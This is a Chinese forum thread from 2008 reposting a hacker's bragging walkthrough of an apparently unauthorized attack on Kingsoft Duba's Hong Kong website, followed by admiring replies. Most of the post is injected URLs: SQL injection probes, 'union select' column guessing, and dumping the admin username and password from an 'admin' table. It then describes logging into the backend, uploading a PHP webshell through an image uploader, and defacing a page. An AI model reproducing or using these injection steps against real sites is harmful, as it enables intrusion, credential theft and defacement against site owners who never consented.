qqqqqqqqqq 发表于 2008-12-21 12:28:22

高手实在是高!

顽固小子 发表于 2008-12-21 12:31:47

说实话 真的好牛B

miswe 发表于 2008-12-21 12:47:43

呵、!

莪是路过的。!

..

疯子 发表于 2008-12-21 12:51:00

真的假的啊!你黑的,還是轉來的!

accp 发表于 2008-12-21 12:25:37

友情检测强大的金山毒霸公司

友情检测强大的金山毒霸公司!作者:寂寞黑夜
来源:www.xbsafe.cn

记得上次CCTV被黑.是一个SA注入点,而且大家很早就知道.只是不敢动而已,后来小波动了.这次金山也纯在这个注入漏洞.呵呵..
首先我看了下主页.一切都很正常.

http://www.xbsafe.cn/attachment/thumb/10_21_e8518c8eabc9309.jpg
于是点击新闻看看... 提交'
http://www.duba.com.hk/***ws.php?nid=000000***'
出错了.从错误中可以得知.该页面存在注入.且站点使用mysql数据库
呵呵..sql语言好久没复习了..


http://www.xbsafe.cn/attachment/thumb/10_21_e6d4786bd6d8eca.jpg
然后在这个页面上在提交http://www.duba.com.hk/****.php?nid=0000000**** and 1=1
返回正常...
然后在提交http://www.duba.com.hk/n****s.php?nid=0000000****4 and 1=2
返回的页面不一样...确定金山安全公司的***.php这个页面存在注入漏洞...
于是立即打开google开始对他进行踩点,

http://www.xbsafe.cn/attachment/thumb/10_21_380d6e153d0fb9f.jpg
好多信息.金山果然是国内大名鼎鼎的杀毒厂商..JB新闻真多.. 不管了 一个一个找
找到了一个奇怪的连接是鸟文的我点进去看...
http://www.duba.com.hk/founder/****.php?cng_region=1&nid=000000000***
然后提交http://www.duba.com.hk/founder/****.php?cng_region=1&nid=00000000***'
页面错误提示我
invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\'' at line 1
于是我在提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000000000*** and 1=1
返回页面正常
提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=00000000*** and 1=2
页面是空的于是我决定就用这个注入点下手....
提交http://www.duba.com.hk/founder/***.php?cng_region=1&nid=000000000*** and 1=2 union select 1,2,3 from admin
发现页面提示我select查询语句错误

http://www.xbsafe.cn/attachment/thumb/10_21_60d7328c2d4c015.jpg
开始感觉奇怪了..管理员表根据我平时数据库设计俺就弄了一个3个列 难道还有其他的?
于是我再次提交了http://www.duba.com.hk/founder/****.php?cng_region=1&nid=0000000**** and 1=2 union select 1,2,3,4 from admin
呵呵..出来了.. 被我猜中了...页面爆出 3 4 列有东西...看来平时好好学习数据库设计还是有用的...


http://www.xbsafe.cn/attachment/10_21_4f342c51e6b8be5.jpg

接下来就是提交:http://www.duba.com.hk/founder/****.php?cng_region=1&nid=00000000*** and 1=2 union select 1,2,username,4 from admin 成功的爆出管理员用户名


http://www.xbsafe.cn/attachment/10_21_b1e5fb28c9f642e.jpg
那当然第4的位置应该是密码了...密码一般管理员都是用password,pas,pwd,等作为数据库列名 那我们就一个一个试吧
提交:http://www.duba.com.hk/founder/***.php?cng_region=1&nid=00000000*** and 1=2 union select 1,2,username,password from admin
列名不对:页面提示我:invalid query: Unknown column 'password' in 'field list'
那就用第二个吧pas:我们继续提交地址:http://www.duba.com.hk/founder/***.php?cng_region=1&nid=00000000*** and 1=2 union select 1,2,username,pas from admin
还是错的..晕死.. 继续试..发扬乌龟精神..
继续提交地址:http://www.duba.com.hk/founder/****.php?cng_region=1&nid=00000000*** and 1=2 union select 1,2,username,pwd from admin
嘿嘿..搞定了..原来列名是pwd的..简写..

http://www.xbsafe.cn/attachment/thumb/10_21_d16370672b3e29a.jpg
在已经有管理员账号密码了 登陆后台...

http://www.xbsafe.cn/attachment/thumb/10_21_0bcbaec8819b314.jpg
找了很久..才找到一个上次的地方...

http://www.xbsafe.cn/attachment/thumb/10_21_06490dd59fcb82e.jpg
图片的地方可以直接上次php的..成功的得到webshell

http://www.xbsafe.cn/attachment/thumb/10_21_6f04d8480477058.jpg
黑页地址:http://www.duba.com.hk/founder/images/product/p_help.html


呵呵...其实没什么技术含量..管理员疏忽了sql注入漏洞而已..但是小小漏洞危害大..
最后想和我交流的欢迎到www.xbsafe.cn 我的论坛ID是小道

PS:
对安全人士来说 : 一招 致命,你防了吗?
对黑客人士来说 : 一招 致命,你会了吗?
技术是无罪的,快乐就在思考。
攻防是种哲学,输赢只在一招。

kingss 发表于 2010-3-5 11:42:09

LZ很强哦。。。。。

holl123 发表于 2010-3-10 17:33:56

LZ很强哦。。。。。
页: [1]
查看完整版本: 友情检测强大的金山毒霸公司